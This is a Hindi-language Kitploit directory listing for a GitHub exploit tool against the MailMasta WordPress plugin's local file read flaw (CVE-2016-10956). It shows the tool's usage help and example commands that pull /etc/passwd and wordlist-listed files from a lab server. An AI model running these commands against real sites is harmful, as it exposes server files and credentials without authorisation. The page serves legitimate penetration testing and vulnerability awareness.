Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2016-10956-mail-masta — MailMasta WordPress प्लगइन स्थानीय फ़ाइल समावेशन भेद्यता (CVE-2016-10956) | Kitploit
उपकरण/GitHubGitHub/p0dalirius/cve-2016-10956-mail-masta
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubp0dalirius/cve-2016-10956-mail-masta

CVE-2016-10956-mail-masta

MailMasta WordPress प्लगइन स्थानीय फ़ाइल समावेशन भेद्यता (CVE-2016-10956)

रिपॉजिटरी देखेंवेबसाइट
21214 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मेल मास्टा - स्थानीय फ़ाइल पढ़ना (CVE-2016-10956)

GitHub release (latest by date) YouTube Channel Subscribers

वर्डप्रेस के लिए मेल-मास्टा प्लगइन 1.0 में count_of_send.php और csvexport.php में स्थानीय फ़ाइल पढ़ने की सुविधा है।

उपयोग

root@kitploit:~
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

प्रदर्शन

एक विशिष्ट दूरस्थ फ़ाइल पढ़ें

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

वर्डलिस्ट से विशिष्ट दूरस्थ फ़ाइलें पढ़ें

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

वर्डलिस्ट से विशिष्ट दूरस्थ फ़ाइलें पढ़ें और केवल मिली फ़ाइलें प्रिंट करें

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10956
  • https://cxsecurity.com/issue/WLB-2016080220
  • https://wordpress.org/plugins/mail-masta/#developers
  • https://wpvulndb.com/vulnerabilities/8609
टूल डाउनलोड करें